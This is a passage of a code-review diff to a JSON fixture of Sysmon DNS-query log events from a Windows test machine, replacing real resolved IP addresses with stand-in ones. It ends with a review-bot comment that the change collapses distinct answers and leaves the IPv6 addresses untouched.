(x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067594200Z'/\u003e\u003cEventRecordID\u003e207\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.322\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.crwdcntrl.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 td.crwdcntrl.net;type: 5 nginx-bcp-stackB-428666447.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -7606,7 +7606,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067634800Z'/\u003e\u003cEventRecordID\u003e208\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.730\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.sync.ad.cpe.dotomi.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cpe.us.dotomi.weighted.com.akadns.net;type: 5 cpe.us.iad.dotomi.weighted.com.akadns.net;type: 5 iad04-convex.dotomi.com;::ffff:159.127.42.114;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067634800Z'/\u003e\u003cEventRecordID\u003e208\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.730\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.sync.ad.cpe.dotomi.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cpe.us.dotomi.weighted.com.akadns.net;type: 5 cpe.us.iad.dotomi.weighted.com.akadns.net;type: 5 iad04-convex.dotomi.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -7617,7 +7617,7 @@
 "event_data": {
 "QueryName": "match.sync.ad.cpe.dotomi.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 cpe.us.dotomi.weighted.com.akadns.net;type: 5 cpe.us.iad.dotomi.weighted.com.akadns.net;type: 5 iad04-convex.dotomi.com;::ffff:159.127.42.114;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;",
+ "QueryResults": "type: 5 cpe.us.dotomi.weighted.com.akadns.net;type: 5 cpe.us.iad.dotomi.weighted.com.akadns.net;type: 5 iad04-convex.dotomi.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:09.730",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -7648,7 +7648,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:11.066534000Z'/\u003e\u003cEventRecordID\u003e209\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:10.627\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps10230.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:11.066534000Z'/\u003e\u003cEventRecordID\u003e209\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:10.627\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps10230.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -7680,7 +7680,7 @@ "ProcessId": "2736", "QueryName": "tps10230.doubleverify.com", "QueryStatus": "0", - "QueryResults": "type: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;" + "QueryResults": "type: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;" } }, "agent": { 
@@ -7697,7 +7697,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:11.066558700Z'/\u003e\u003cEventRecordID\u003e210\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:10.650\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps10221.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:11.066558700Z'/\u003e\u003cEventRecordID\u003e210\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:10.650\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps10221.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -7725,7 +7725,7 @@ "ProcessId": "2736", "QueryName": "tps10221.doubleverify.com", "QueryStatus": "0", - "QueryResults": "type: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;", + "QueryResults": "type: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:10.650" }, 
@@ -7753,7 +7753,7 @@
 },
 "event_data": {
 "QueryStatus": "0",
- "QueryResults": "type: 5 star-mini.c10r.facebook.com;::ffff:31.13.71.36;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;",
+ "QueryResults": "type: 5 star-mini.c10r.facebook.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:16.329",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -7777,7 +7777,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272022200Z'/\u003e\u003cEventRecordID\u003e212\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.329\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.facebook.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 star-mini.c10r.facebook.com;::ffff:31.13.71.36;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272022200Z'/\u003e\u003cEventRecordID\u003e212\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.329\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.facebook.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 star-mini.c10r.facebook.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" } 
@@ -7785,7 +7785,7 @@ { "@timestamp": "2021-05-05T15:30:51.712Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272102900Z'/\u003e\u003cEventRecordID\u003e213\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.386\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eplatform.twitter.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs472.wac.edgecastcdn.net;type: 5 cs1-apr-8315.wac.edgecastcdn.net;type: 5 wac.apr-8315.edgecastdns.net;type: 5 cs1-lb-us.8315.ecdns.net;type: 5 cs491.wac.edgecastcdn.net;::ffff:192.229.163.25;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272102900Z'/\u003e\u003cEventRecordID\u003e213\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.386\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eplatform.twitter.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs472.wac.edgecastcdn.net;type: 5 cs1-apr-8315.wac.edgecastcdn.net;type: 5 wac.apr-8315.edgecastdns.net;type: 5 cs1-lb-us.8315.ecdns.net;type: 5 cs491.wac.edgecastcdn.net;::ffff:192.168.163.25;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -7809,7 +7809,7 @@
 "level": "information",
 "event_data": {
 "QueryStatus": "0",
- "QueryResults": "type: 5 cs472.wac.edgecastcdn.net;type: 5 cs1-apr-8315.wac.edgecastcdn.net;type: 5 wac.apr-8315.edgecastdns.net;type: 5 cs1-lb-us.8315.ecdns.net;type: 5 cs491.wac.edgecastcdn.net;::ffff:192.229.163.25;",
+ "QueryResults": "type: 5 cs472.wac.edgecastcdn.net;type: 5 cs1-apr-8315.wac.edgecastcdn.net;type: 5 wac.apr-8315.edgecastdns.net;type: 5 cs1-lb-us.8315.ecdns.net;type: 5 cs491.wac.edgecastcdn.net;::ffff:192.168.163.25;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:16.386",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -7829,7 +7829,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272134300Z'/\u003e\u003cEventRecordID\u003e214\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.482\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esyndication.twitter.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:104.244.42.8;::ffff:104.244.42.200;::ffff:104.244.42.136;::ffff:104.244.42.72;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272134300Z'/\u003e\u003cEventRecordID\u003e214\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.482\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esyndication.twitter.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { 
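Review bot: The replacement collapses four distinct A-record answers into four copies of the same address (`::ffff:89.160.20.156;` repeated), so this fixture no longer exercises a response with several distinct resolved IPs, and whether the pipeline keeps or deduplicates repeated answers is no longer covered here; the hunks at @@ -7859 and @@ -8533/-8550 follow the same pattern. If the supported subset offers more than one address, using distinct ones would preserve the original coverage. The IPv6 answers on the same line (`2001:503:a83e::2:30` and the others) are carried over unchanged while every IPv4 answer was rewritten, which looks inconsistent with the stated move to the supported subset — worth confirming whether those also need swapping. This `original` value is one diff line that the paste splits across two, and the enclosing JSON object starts and ends outside the hunk.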
